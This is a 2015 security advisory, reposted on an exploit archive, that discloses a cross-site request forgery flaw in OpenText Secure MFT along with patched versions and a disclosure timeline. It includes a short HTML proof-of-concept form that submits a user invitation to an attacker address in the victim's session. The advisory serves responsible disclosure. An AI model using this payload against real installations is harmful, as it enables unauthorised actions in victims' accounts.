exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Secure MFT Cross Site Request Forgery

Secure MFT Cross Site Request Forgery
Posted Oct 4, 2015
Authored by Dr. Adrian Vollmer | Site syss.de

Secure MFT versions 2013 R3, 2014 R1/R2, and 2015 R1 suffer from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 7b7b950f13f6e8a3166c6357b150cb9a151e2570df70f27a19579dd07eb18a21

Secure MFT Cross Site Request Forgery

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-039
Product: Secure MFT
Vendor: http://www.opentext.com
Affected Version(s): 2013 R3, 2014 R1/R2, 2015 R1
Tested Version(s): 2014 R2 SP4
Vulnerability Type: Cross-Site Request Forgery (CWE-352)
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2015-08-05
Solution Date: 2015-09-23
Public Disclosure: 2015-10-02
CVE Reference: Not yet assigned
Author of Advisory: Dr. Adrian Vollmer

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Secure MFT aims to replace FTP or file transfer via e-mail by providing a
secure and easy-to-use alternative. Users can send each other files of
practically any size either by using a Microsoft Windows client, a Microsoft
Outlook plugin or a web application.

The software manufacturer describes the application as follows
(see [1]):

"OpenText Secure MFT is an enterprise-grade managed file transfer solution
that delivers uncompromising security to safely exchange large files."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The web application is vulnerable to Cross-Site Request Forgery since no
tokens are used to prevent this kind of attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

As a proof of concept, the following HTML document could be used by an
attacker to perform actions in the context of the victim if the attacker
manages to trick the victim into opening the document in their browser.

<html>
<body>
<form action="https://[Secure MFT host]/userinvitation" method="POST">
<input type="hidden" name="email" value="attacker@example.org" />
<input type="hidden" name="subject" value="CSRF Invite" />
<input type="hidden" name="message" value="CSRF Message" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update Secure MFT to one of the following versions or newer:

* Secure MFT 2013 R3 SP7
* Secure MFT 2014 R1 SP11
* Secure MFT 2014 R2 SP5
* Secure MFT 2015 R1 SP1
* Secure MFT 2015 R1 FP1 SP1

Software updates are available at [5]. For further information, see [4].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-07-01: Vulnerability discovered
2015-08-05: Vulnerability reported to vendor
2015-09-23: Vendor publishes security alert
2015-10-02: Public release of security advisory according to the SySS
Responsible Disclosure Policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Web site of Secure MFT
https://www.opentext.com/what-we-do/products/information-exchange/secure-messaging/opentext-secure-mft
[2] SySS Security Advisory SYSS-2015-039
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-039.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
[4] https://knowledge.opentext.com/knowledge/cs.dll/Open/61171764 (Knowledge Center log on required)
[5] https://knowledge.opentext.com/knowledge/llisapi.dll?func=ll&objId=61042901&objAction=browse&viewType=1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Adrian Vollmer of the SySS GmbH.

E-Mail: adrian.vollmer (at) syss.de
Key fingerprint = 70CF E88C AEE7 DB0F 5DC8 3403 0E02 7C7E 037C 9FE7

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJWDi/6AAoJEA4CfH4DfJ/n5WkP/0aveg0S+J2aKuwVv88wNwTr
0lMQFAM83UWmpgP6Mj/PrmMOQBK+Qc41sHsJ737ibEIxcnPhNXlpbN8d+TMl9uJ5
dqQAcLecTC3gzfuNvu89qhoG1XOP34lKCgVHMP1NTsyzvqORR7TZYYMSxHicA4+y
qSvWcjiIiyfSHTvcHj4/TU7UjqE4CBQehqw184Jor7vg5hm5OH2eJl0M4ptpMLek
QoQkf6IpVZrdXzPwknUMra/LKxIDmGouPwhEKXNmkJV1Ti6FbgN/td+6gbpnqPbi
pUHn5VQsxlBXlf9KuJX9lZKshrtxXZ0hLbK32qVEAO9rDwgUeDN4YQFK0CHAlFNi
0p7WdQbR8o47l8e77IrwsKWmmo6z5SkaeOZYMgvCrzH/9mGfbVk43HQ/iMA8jN3J
ggEaK+9l+7r/VWGNt7QLkf/h0sBlfqaj626gw5ncFF9/9Hc61ouC0UQEzLrAYYz6
FvHvEKzISUPkSzVcKH6K4cfjIvsj57Hs1jghVMBibTeVQf7hTVn2KMUHzno/ZI4y
fAU6slyu4aG8Y/SrHqGUqEKVGtLXaSGo8TsDjThU7pxeFvbIfCM1z7J0I6QuztLl
hN2PLWI48M72xgv/hm2wBaCTLG41BGFHbY7MzWacCuq568aCm+tFOWqGVhsTOPXm
Tu89cKLfbXW4oarRud5W
=aroc
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    8 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    7 Files
  • 29
    Oct 29th
    17 Files
  • 30
    Oct 30th
    39 Files
  • 31
    Oct 31st
    17 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close